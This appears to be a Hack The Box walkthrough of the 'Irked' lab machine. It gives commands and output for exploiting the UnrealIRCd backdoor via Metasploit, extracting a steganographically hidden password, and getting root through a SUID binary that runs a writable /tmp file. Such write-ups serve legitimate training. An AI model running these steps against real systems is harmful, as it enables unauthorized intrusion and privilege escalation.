As usual, we will start off with a nmap scan.
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 34271/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd
Looks like irc is running on a couple ports as well as httpd. Taking into account the name of the box, its probably safe to assume irc is the way in, but first lets look at the website.
Hmm, lets pull down that jpg for later.
A quick google of UnrealIRCd returns a backdoor in the 3.2.8.1 (cve-2010-2075) release and there is a Metasploit module. Lets set it up on port 8067 and see what we get.
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 10.10.10.117 yes The target address RPORT 8067 yes The target port (TCP)
Works and we get dropped into a user named ircd.
whoami ircd
Looking through home directories, there are a couple interesting files found in another user’s Documents directory.
/home/djmardov/Documents ls -lah total 16K drwxr-xr-x 2 djmardov djmardov 4.0K May 15 2018 . drwxr-xr-x 18 djmardov djmardov 4.0K Nov 23 10:40 .. -rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup -rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
Catting out the .backup file gives us a password and a bit of a hint.
Super elite steg backup pw UP********************ss
Now, we have a password and a hint pointing to stego. Lets look at the jpg we downloaded earlier with steghide.
steghide extract -sf irked.jpg
This gives use another file, pass.txt.
Ka************HG
Using that password to ssh in as the user that owned the file, we now have access to user.txt and a clean shell.
cat user.txt 4a****************************8e
After a bit of enumeration, we find an executable with an interesting name.
find / -user root -perm -4000 -print 2>/dev/null /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/sbin/exim4 /usr/sbin/pppd /usr/bin/chsh /usr/bin/procmail /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/pkexec /usr/bin/X /usr/bin/passwd /usr/bin/chfn /usr/bin/viewuser /sbin/mount.nfs /bin/su /bin/mount /bin/fusermount /bin/ntfs-3g /bin/umount
Running that gives us one more hint. It looks like its calling another file.
/usr/bin/viewuser (unknown) :0 2018-11-22 12:34 (:0) sh: 1: /tmp/listusers: not found This application is being devleoped to set and test user permissions It is still being actively developed
Creating a file containing /bin/bash in that location and running it again gives us a root shell and the root flag.
echo "/bin/bash" > /tmp/listusers chmod +x /tmp/listusers /usr/bin/viewuser (unknown) :0 2018-11-22 12:34 (:0) whoami root cat /root/root.txt 8d****************************f3
NOTE: We do not need to use the djmardov user for this, in fact. The privesc can be done via the ircd user, then the user flag can be accessed via the root user. This is, however, probably not the intended path.
This was a pretty direct machine, however the use of stego to hide a password is a little unrealistic. A few of the new machines being added to the active lineup have been more real-world, for example DevOops, which make them a bit more fun.